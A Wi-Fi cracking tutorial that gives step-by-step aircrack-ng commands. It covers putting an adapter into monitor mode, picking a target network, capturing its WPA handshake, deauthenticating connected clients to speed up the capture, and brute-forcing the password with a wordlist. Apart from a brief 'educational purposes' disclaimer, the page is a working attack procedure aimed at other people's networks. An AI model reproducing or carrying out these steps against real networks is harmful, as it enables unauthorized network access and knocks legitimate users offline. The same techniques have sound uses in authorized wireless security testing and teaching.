How to Crack a Wifi

This tutorial demonstrates how to crack a Wi-Fi network using a wireless adapter in monitor mode and the aircrack-ng suite. Created by @bst04.

Disclaimer: This guide is intended for educational purposes only. Unauthorized access to any network is illegal and unethical. Use this knowledge responsibly and ethically.

πŸ“Œ Basic Information

1. Network Protocols

Understanding the protocols used in Wi-Fi networks is essential:

  • WEP (Wired Equivalent Privacy): An obsolete protocol with significant security flaws.

  • WPA (Wi-Fi Protected Access): Improved security over WEP but still vulnerable to weak passwords.

  • WPA2: More secure than WPA, using AES/PSK encryption. Still susceptible to brute-force attacks if weak passwords are used.

  • WPA3: The latest standard with enhanced protection against brute-force attacks. However, not all networks have adopted it yet.

2. Encryption and Authentication Methods

  • TKIP (Temporal Key Integrity Protocol): Legacy encryption with dynamic keys per packet; vulnerable to brute-force attacks.

  • AES (Advanced Encryption Standard): A secure symmetric encryption method widely used in modern Wi-Fi networks.

  • PSK (Pre-Shared Key): Commonly used for home networks, where a shared key is used for authentication. Vulnerable to brute-force attacks if the password is weak.

πŸ“‹ Requirements

Before proceeding, ensure you have the following:

  1. Aircrack-ng Suite: Installed on your system.

  2. Wireless Adapter Compatible with Monitor Mode: Ensure your adapter supports packet injection and monitor mode.

πŸš€ Step-by-Step Process

Step 1: Install Aircrack-ng

If you're not using Kali Linux, you'll need to install the aircrack-ng suite. Run the following command in your terminal:

sudo apt-get update
sudo apt-get install aircrack-ng

Note: If you're using Kali Linux, aircrack-ng is pre-installed.

Step 2: Enable Monitor Mode

To capture packets from the target network, your wireless adapter must be in monitor mode. First, identify your wireless interface by running:

ip addr

Once you know the interface name (e.g., wlan0), enable monitor mode:

sudo airmon-ng start [interface]

Example: If your interface is wlan0, run:

sudo airmon-ng start wlan0

This will create a new interface, typically named wlan0mon.

Step 3: Scan for Wi-Fi Networks

Use airodump-ng to scan for nearby Wi-Fi networks:

sudo airodump-ng [interface + mon]

Example: If your monitor mode interface is wlan0mon, run:

sudo airodump-ng wlan0mon

This will display a list of available networks, including their BSSID (MAC address), channel, and encryption type. Note down the details of the target network.

Step 4: Capture the Handshake

Focus on the target network by capturing its handshake. Use the following command:

sudo airodump-ng -c [channel] --bssid [BSSID] -w [output file] [interface + mon]

Example: If the target network is on channel 6 with BSSID 00:11:22:33:44:55, run:

sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon

Leave this process running until the handshake is captured. You can verify the capture by checking the output file (capture-01.cap).

To speed up the handshake capture, deauthenticate connected clients using aireplay-ng:

sudo aireplay-ng -0 5 -a [BSSID] -c [STATION] [interface + mon]

Example: If the station (connected device) is 66:77:88:99:AA:BB, run:

sudo aireplay-ng -0 5 -a 00:11:22:33:44:55 -c 66:77:88:99:AA:BB wlan0mon

Step 5: Crack the Password

Once you have the handshake file, use aircrack-ng to attempt cracking the password. Provide a wordlist for brute-forcing:

sudo aircrack-ng -w [wordlist file] [handshake file]

Example: If your wordlist is rockyou.txt and the handshake file is capture-01.cap, run:

sudo aircrack-ng -w rockyou.txt capture-01.cap

The tool will try each password in the wordlist until it finds a match or exhausts the list.

πŸ›  Tips and Best Practices

  1. Use a Strong Wordlist: Tools like hashcat or online resources provide comprehensive wordlists.

  2. Optimize Your Wireless Adapter: Ensure your adapter is compatible with packet injection and has good signal reception.

  3. Be Patient: Cracking strong passwords may take time, depending on the complexity and length of the passphrase.

Conclusion

By following these steps, you can learn how to crack a Wi-Fi network using aircrack-ng. Remember to use this knowledge responsibly and within legal boundaries. Happy learning!

Last updated